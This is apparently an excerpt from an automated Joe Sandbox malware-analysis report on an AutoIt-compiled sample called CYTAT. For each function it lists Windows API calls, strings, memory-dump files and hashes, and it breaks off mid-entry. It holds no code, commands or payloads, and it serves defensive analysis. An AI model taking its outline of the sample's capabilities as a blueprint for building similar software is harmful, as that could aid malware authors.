                                                • Opcode ID: 35eb9c3aeff660f135fd63a8918d5c45c4a90ea0b18b9c33d96ad8571bc730e4
                                                • Instruction ID: 6ef9d3a4897ddb850998a39013325e9d2daf595bbef4806ea59c93c68b265cd6
                                                • Opcode Fuzzy Hash: 35eb9c3aeff660f135fd63a8918d5c45c4a90ea0b18b9c33d96ad8571bc730e4
                                                • Instruction Fuzzy Hash: F8A10873A0061487CB209F5AE48066AF7B0FF84721F1485AFED849B341C736AD99D7E5
                                                Function 004091B0 Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 324sleepCOMMON
                                                Download Yara Rule
                                                APIs
                                                • InterlockedIncrement.KERNEL32(004A7F04), ref: 0042C659
                                                • InterlockedDecrement.KERNEL32(004A7F04), ref: 0042C677
                                                • Sleep.KERNEL32(0000000A), ref: 0042C67F
                                                • InterlockedIncrement.KERNEL32(004A7F04), ref: 0042C68A
                                                • InterlockedDecrement.KERNEL32(004A7F04), ref: 0042C73C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Interlocked$DecrementIncrement$Sleep
                                                • String ID: @COM_EVENTOBJ
                                                • API String ID: 327565842-2228938565
                                                • Opcode ID: ca0223daa9e96e83c575322b086aef175ea6f60956e985fc72e5b4b432ff0b62
                                                • Instruction ID: 079f2a2c733a9a3e151bbe14bd9981fb61a061d6167fc58a91b905d371dd4d86
                                                • Opcode Fuzzy Hash: ca0223daa9e96e83c575322b086aef175ea6f60956e985fc72e5b4b432ff0b62
                                                • Instruction Fuzzy Hash: 18D1D271A002198FDB10EF94C985BEEB7B0FF45304F60856AE5057B392D778AE46CB98
                                                Function 0047025C Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 288COMMON
                                                Download Yara Rule
                                                APIs
                                                • VariantClear.OLEAUT32(?), ref: 0047031B
                                                • VariantClear.OLEAUT32(?), ref: 0047044F
                                                • VariantInit.OLEAUT32(?), ref: 004704A3
                                                • DispCallFunc.OLEAUT32(?,?,?,00000015,?,?,?,?), ref: 00470504
                                                • VariantClear.OLEAUT32(?), ref: 00470516
                                                  • Part of subcall function 00435481: VariantCopy.OLEAUT32(?,?), ref: 00435492
                                                • VariantCopy.OLEAUT32(?,?), ref: 0047057A
                                                  • Part of subcall function 00435403: VariantClear.OLEAUT32(?), ref: 00435414
                                                • VariantClear.OLEAUT32(00000000), ref: 0047060D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Variant$Clear$Copy$CallDispFuncInit
                                                • String ID: H
                                                • API String ID: 3613100350-2852464175
                                                • Opcode ID: f2b9533c7a0a825d738ebca76906f6301bd96a0988b7340563647801aa66eb79
                                                • Instruction ID: 4e55d858753f5aac0b63ea9498fb9ef25a468b81cfd7169f1740116cc4944d08
                                                • Opcode Fuzzy Hash: f2b9533c7a0a825d738ebca76906f6301bd96a0988b7340563647801aa66eb79
                                                • Instruction Fuzzy Hash: 93B15BB5605311EFD710DF54C880A6BB3A4FF88308F049A2EFA8997351D738E951CB9A
                                                Function 00401CB0 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 240COMMON
                                                Download Yara Rule
                                                APIs
                                                • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00401D06
                                                • DestroyWindow.USER32(?), ref: 00426F50
                                                • UnregisterHotKey.USER32(?), ref: 00426F77
                                                • FreeLibrary.KERNEL32(?), ref: 0042701F
                                                • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00427050
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Free$DestroyLibrarySendStringUnregisterVirtualWindow
                                                • String ID: close all
                                                • API String ID: 4174999648-3243417748
                                                • Opcode ID: 4fd900de9a28da208b58a3ba22ecdd4c26f042792ef41b4fe823b5ed5eb78ac9
                                                • Instruction ID: 89fc9d45334329c88beddca7a6314a06ce6e15860ee53b488cbf8147960762b2
                                                • Opcode Fuzzy Hash: 4fd900de9a28da208b58a3ba22ecdd4c26f042792ef41b4fe823b5ed5eb78ac9
                                                • Instruction Fuzzy Hash: 9BA1C174710212CFC710EF15C985B5AF3A8BF48304F5045AEE909672A2CB78BD96CF99
                                                Function 0044AA86 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 174networkCOMMON
                                                Download Yara Rule
                                                APIs
                                                • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0044AAC5
                                                • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0044AAFA
                                                • InternetQueryOptionW.WININET(00000000,0000001F,00000000,00001000), ref: 0044AB5E
                                                • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0044AB74
                                                • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044AB83
                                                • HttpQueryInfoW.WININET(00000000,00000005,?,00001000,00000000), ref: 0044ABBB
                                                  • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: HttpInternet$OptionQueryRequest$ConnectErrorInfoLastOpenSend
                                                • String ID:
                                                • API String ID: 1291720006-3916222277
                                                • Opcode ID: 91fdcc8e85295173cca015a6521aec32459a41892940df1d160b2f6c73229ea3
                                                • Instruction ID: 89538bfc19842651326e528327905a39262a83d8aa3acd63c003c629d13479a9
                                                • Opcode Fuzzy Hash: 91fdcc8e85295173cca015a6521aec32459a41892940df1d160b2f6c73229ea3
                                                • Instruction Fuzzy Hash: FA51B1756403087BF710DF56DC86FEBB7A8FB88715F00851EFB0196281D7B8A5148BA8
                                                Function 0045FBAC Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 147windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetMenuItemInfoW.USER32(?,FFFFFFFF,00000000,00000030), ref: 0045FC48
                                                • IsMenu.USER32(?), ref: 0045FC5F
                                                • CreatePopupMenu.USER32 ref: 0045FC97
                                                • GetMenuItemCount.USER32(?), ref: 0045FCFD
                                                • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0045FD26
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                • String ID: 0$2
                                                • API String ID: 93392585-3793063076
                                                • Opcode ID: f01c363b391305104942df3bb39f3e86dedaf87795108832ec1df4cdc4019c53
                                                • Instruction ID: a5f6d3c146e885c54ead74f35c39eec4acd60bc9fc93d28bc39e3d14768ea649
                                                • Opcode Fuzzy Hash: f01c363b391305104942df3bb39f3e86dedaf87795108832ec1df4cdc4019c53
                                                • Instruction Fuzzy Hash: B55192719002099BDB11DF69D888BAF7BB4BB44319F14853EEC15DB282D3B8984CCB66
                                                Function 004352C2 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 114COMMON
                                                Download Yara Rule
                                                APIs
                                                • SafeArrayAccessData.OLEAUT32(?,?), ref: 004352E6
                                                • VariantClear.OLEAUT32(?), ref: 00435320
                                                • SafeArrayUnaccessData.OLEAUT32(?), ref: 00435340
                                                • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00435373
                                                • VariantClear.OLEAUT32(?), ref: 004353B3
                                                • SafeArrayUnaccessData.OLEAUT32(?), ref: 004353F6
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: ArrayDataSafeVariant$ClearUnaccess$AccessChangeType
                                                • String ID: crts
                                                • API String ID: 586820018-3724388283
                                                • Opcode ID: 545d374044e3945891266c858ffc3b068b1e43ab9a1ba77500f3c10b34ab4cdf
                                                • Instruction ID: e94501f388d0d73ced66c0aa9444ce68fa972137b9c89e1913ae9ea64c05cbbc
                                                • Opcode Fuzzy Hash: 545d374044e3945891266c858ffc3b068b1e43ab9a1ba77500f3c10b34ab4cdf
                                                • Instruction Fuzzy Hash: DE418BB5200208EBDB10CF1CD884A9AB7B5FF9C314F20852AEE49CB351E775E911CBA4
                                                Function 0044BBD2 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 105filestringCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,004A7F6C,0040F545,004A7F6C,004A90E8,004A7F6C,?,0040F545), ref: 0041013C
                                                • lstrcmpiW.KERNEL32(?,?), ref: 0044BC09
                                                • MoveFileW.KERNEL32(?,?), ref: 0044BC3F
                                                • _wcscat.LIBCMT ref: 0044BCAF
                                                • _wcslen.LIBCMT ref: 0044BCBB
                                                • _wcslen.LIBCMT ref: 0044BCD1
                                                • SHFileOperationW.SHELL32(?), ref: 0044BD17
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: File_wcslen$FullMoveNameOperationPath_wcscatlstrcmpi
                                                • String ID: \*.*
                                                • API String ID: 2326526234-1173974218
                                                • Opcode ID: dfa273c9728ae0aa44cf40aad3cddd2261aca17058b0337a789aafef13e29e40
                                                • Instruction ID: cfb238852dc788c6f4e4306d35388aa956c556a9525b71239849112dc74cb112
                                                • Opcode Fuzzy Hash: dfa273c9728ae0aa44cf40aad3cddd2261aca17058b0337a789aafef13e29e40
                                                • Instruction Fuzzy Hash: 5C3184B1800219AACF14EFB1DC85ADEB3B5AF48304F5095EEE90997211EB35D748CB98
                                                Function 004335CD Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 90COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00433244: _wcsncpy.LIBCMT ref: 0043325C
                                                • _wcslen.LIBCMT ref: 004335F2
                                                • GetFileAttributesW.KERNEL32(?), ref: 0043361C
                                                • GetLastError.KERNEL32 ref: 0043362B
                                                • CreateDirectoryW.KERNEL32(?,00000000), ref: 0043363F
                                                • _wcsrchr.LIBCMT ref: 00433666
                                                  • Part of subcall function 004335CD: CreateDirectoryW.KERNEL32(?,00000000), ref: 004336A7
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: CreateDirectory$AttributesErrorFileLast_wcslen_wcsncpy_wcsrchr
                                                • String ID: \
                                                • API String ID: 321622961-2967466578
                                                • Opcode ID: bb0dad1fe383a450cc5ca78da39c882eba2540a6c71c70dd25c8590f96c38e52
                                                • Instruction ID: 66c6ecc179b40ab72a0151a8d865592f5e80cbeaaa2383c239fb12261b929cf9
                                                • Opcode Fuzzy Hash: bb0dad1fe383a450cc5ca78da39c882eba2540a6c71c70dd25c8590f96c38e52
                                                • Instruction Fuzzy Hash: C72129719013146ADF30AF25AC06BEB73AC9B05715F10569AFD18C2241E6799A888BE9
                                                Function 0044C7DD Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 88COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: __wcsnicmp
                                                • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                • API String ID: 1038674560-2734436370
                                                • Opcode ID: 8f8f9edfa5db0492502b932a8328ea4ae50c7534afe07431ae24ccbcd5f30aff
                                                • Instruction ID: d05ed79ef8649e951018b8bbb1c2d61e3c33a7345c6b0b1fc41c187b8edaa79f
                                                • Opcode Fuzzy Hash: 8f8f9edfa5db0492502b932a8328ea4ae50c7534afe07431ae24ccbcd5f30aff
                                                • Instruction Fuzzy Hash: 1221003365151066E72176199C82FDBB3989FA5314F04442BFE049B242D26EF99A83E9
                                                Function 00434034 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 49windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetModuleHandleW.KERNEL32(00000000,004A90E8,?,00000100,?,004A7F6C), ref: 00434057
                                                • LoadStringW.USER32(00000000), ref: 00434060
                                                • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00434075
                                                • LoadStringW.USER32(00000000), ref: 00434078
                                                • _wprintf.LIBCMT ref: 004340A1
                                                • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004340B9
                                                Strings
                                                • %s (%d) : ==> %s: %s %s, xrefs: 0043409C
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: HandleLoadModuleString$Message_wprintf
                                                • String ID: %s (%d) : ==> %s: %s %s
                                                • API String ID: 3648134473-3128320259
                                                • Opcode ID: 5806584fae846cee426602f55e287a2c1afdddb79e6f9c87a69d5249cd46d2cb
                                                • Instruction ID: 3f99f1473d628bc1a501e0113e735bb0cc043e2cca9b2706ac47da9b95460e2a
                                                • Opcode Fuzzy Hash: 5806584fae846cee426602f55e287a2c1afdddb79e6f9c87a69d5249cd46d2cb
                                                • Instruction Fuzzy Hash: EB016CB26903187EE710E754DD06FFA376CEBC4B11F00459AB708A61C49AF469848BB5
                                                Function 0041793C Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 40COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • GetModuleHandleW.KERNEL32(KERNEL32.DLL,0048D148,00000008,00417A44,00000000,00000000,?,004115F6,?,00401BAC,?,?,?), ref: 0041794D
                                                • __lock.LIBCMT ref: 00417981
                                                  • Part of subcall function 004182CB: __mtinitlocknum.LIBCMT ref: 004182E1
                                                  • Part of subcall function 004182CB: __amsg_exit.LIBCMT ref: 004182ED
                                                  • Part of subcall function 004182CB: EnterCriticalSection.KERNEL32(004115F6,004115F6,?,00417986,0000000D,?,004115F6,?,00401BAC,?,?,?), ref: 004182F5
                                                • InterlockedIncrement.KERNEL32(FF00482A), ref: 0041798E
                                                • __lock.LIBCMT ref: 004179A2
                                                • ___addlocaleref.LIBCMT ref: 004179C0
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                                                • String ID: KERNEL32.DLL$pI
                                                • API String ID: 637971194-197072765
                                                • Opcode ID: de2ab6b473c2d5586c9f362b8c2f57dc22cd34abb7029a86a899895714b74b87
                                                • Instruction ID: a50d44c6e21ae10dfe2421e8c890a682036196f235240147777d58dc068d601e
                                                • Opcode Fuzzy Hash: de2ab6b473c2d5586c9f362b8c2f57dc22cd34abb7029a86a899895714b74b87
                                                • Instruction Fuzzy Hash: A401A171404B00EFD720AF66C90A78DBBF0AF50324F20890FE496536A1CBB8A684CB5D
                                                Function 0046822A Relevance: 12.3, APIs: 8, Instructions: 267COMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: _memmove$_malloc
                                                • String ID:
                                                • API String ID: 1938898002-0
                                                • Opcode ID: ed671e0929b530e8a80a3994f14b14e6c4fa5d49d1ff8bec0f484948025a4d18
                                                • Instruction ID: bb51e0d14dcfee45c4d36839732496dc4400bff611838f67d83ec86e680bb9ef
                                                • Opcode Fuzzy Hash: ed671e0929b530e8a80a3994f14b14e6c4fa5d49d1ff8bec0f484948025a4d18
                                                • Instruction Fuzzy Hash: FC81CB726001195BDB00EF66DC42AFF7368EF84318F040A6FFD04A7282EE7D995587A9
                                                Function 0044B489 Relevance: 12.1, APIs: 8, Instructions: 102fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • InterlockedExchange.KERNEL32(?,000001F5), ref: 0044B4A7
                                                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 0044B4DA
                                                • EnterCriticalSection.KERNEL32(?), ref: 0044B4F7
                                                • _memmove.LIBCMT ref: 0044B555
                                                • _memmove.LIBCMT ref: 0044B578
                                                • LeaveCriticalSection.KERNEL32(?), ref: 0044B587
                                                • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 0044B5A3
                                                • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B5B8
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterLeave_malloc
                                                • String ID:
                                                • API String ID: 2737351978-0
                                                • Opcode ID: c49c3180d4577c37a1564da55573a5370bada98f09f15d951758cfc7caeaac8d
                                                • Instruction ID: 70cbfa243a2dcbaabd352bc30cb9c3ad46017a318630e818b765f133545e4983
                                                • Opcode Fuzzy Hash: c49c3180d4577c37a1564da55573a5370bada98f09f15d951758cfc7caeaac8d
                                                • Instruction Fuzzy Hash: 4F41BC71900308EFDB20DF55D984EAFB7B8EF48704F10896EF54696650D7B4EA80CB58
                                                Function 00415214 Relevance: 12.1, APIs: 8, Instructions: 66threadCOMMON
                                                Download Yara Rule
                                                APIs
                                                • ___set_flsgetvalue.LIBCMT ref: 0041523A
                                                • __calloc_crt.LIBCMT ref: 00415246
                                                • __getptd.LIBCMT ref: 00415253
                                                • CreateThread.KERNEL32(00000000,?,004151BB,00000000,00000004,00000000), ref: 0041527A
                                                • ResumeThread.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0041528A
                                                • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00415295
                                                • _free.LIBCMT ref: 0041529E
